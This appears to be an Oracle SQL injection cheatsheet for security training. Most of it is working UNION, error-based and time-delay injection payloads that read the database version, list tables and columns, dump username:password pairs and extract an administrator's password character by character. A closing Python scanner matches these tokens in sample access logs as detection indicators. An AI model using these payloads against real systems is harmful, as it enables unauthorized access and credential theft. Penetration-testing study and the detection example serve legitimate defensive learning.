# Basic Oracle SQLi Cheatsheet

## Oracle SQL Injection Cheatsheet

### Retrieving Database version

```sql
SELECT banner FROM v$version
```

```
SELECT version FROM v$instance
```

**UNION SQLi Context**

```
' UNION SELECT NULL,banner FROM v$version -- -
```

```
' UNION SELECT NULL,version FROM v$instance -- -
```

> **Note:** In a UNION statement the injected SELECT must return the same number of columns as the first SELECT statement, which is why the payload includes one NULL. You can modify that according to your requirements.

### String Concatenation

```
'string1' || 'string2'
```

```
SELECT username || ':' || password FROM users;
```

**In a UNION SQLi Context**

```
' UNION SELECT NULL,username || ':' || password FROM Users -- -
```

### Substring

```
SELECT SUBSTR(password,2,1) FROM users 
```

**In the UNION SQLi context**

```
' UNION SELECT SUBSTR(password,2,1) FROM users -- -
```

### Comments

```
--comment
```

### Database Contents

**List All Tables**

```
SELECT table_name FROM all_tables;
```

**In a UNION Oracle SQLi context**

```
' UNION SELECT NULL,table_name FROM all_tables -- -
```

**List All Columns**

```
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
```

**In UNION Oracle SQLi**

```
' UNION SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE' -- -
```

### Conditional Errors

```sql
SELECT CASE WHEN LENGTH(password) = 3 THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator'
```

**In UNION Oracle SQLi**

```
' UNION SELECT NULL,NULL,CASE WHEN LENGTH(password)=FUZZ THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator'
```

### Time delays

```
dbms_pipe.receive_message(('a'),10)
```

### Conditional Time delays

```
SELECT CASE WHEN (LENGTH(password) = 3) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM users where username = 'administrator'
```

**In UNION Oracle SQLi**

```
' UNION SELECT NULL,NULL,CASE WHEN (LENGTH(password) = 3) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM users where username = 'administrator'
```
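
From the defender's side, the Oracle-specific tokens on this page (`v$version`, `all_tables`, `dbms_pipe.receive_message`, `TO_CHAR(1/0)`) make usable detection indicators. The following is an added example, not part of the original cheatsheet: it URL-decodes query parameters from web access-log lines and reports which indicators appear. The log lines, the `/products` path, the `category` parameter and the indicator names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Indicators derived from the sections of this cheatsheet (labels are this example's own).
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "version_view": re.compile(r"\bv\$(version|instance)\b", re.I),
    "data_dictionary": re.compile(r"\ball_(tables|tab_columns)\b", re.I),
    "time_delay": re.compile(r"\bdbms_pipe\s*\.\s*receive_message\b", re.I),
    "forced_error": re.compile(r"\bto_char\s*\(\s*1\s*/\s*0\s*\)", re.I),
    "trailing_comment": re.compile(r"--\s*-?\s*$"),
}

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /products?category=Gifts HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /products?category=%27+UNION+SELECT+NULL%2Cbanner+FROM+v%24version+--+- HTTP/1.1" 200 6210',
    '203.0.113.9 - - [01/Jan/2024:10:00:31 +0000] "GET /products?category=dbms_pipe.receive_message((%27a%27)%2C10) HTTP/1.1" 500 312',
]

def scan_request(line):
    """Return the sorted indicator labels found in any query parameter of one log line."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
    if not m:
        return []
    hits = set()
    # parse_qsl percent-decodes each value and turns '+' into a space
    for _name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        for label, pattern in INDICATORS.items():
            if pattern.search(value):
                hits.add(label)
    return sorted(hits)

def scan_log(lines):
    """Map line index -> indicator labels, for lines with at least one hit."""
    findings = {}
    for i, line in enumerate(lines):
        hits = scan_request(line)
        if hits:
            findings[i] = hits
    return findings

if __name__ == "__main__":
    for i, hits in scan_log(SAMPLE_LOG).items():
        print(i, hits)
```

Hits are triage signals rather than proof of exploitation, and input sent in POST bodies or headers does not appear in a standard access log.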

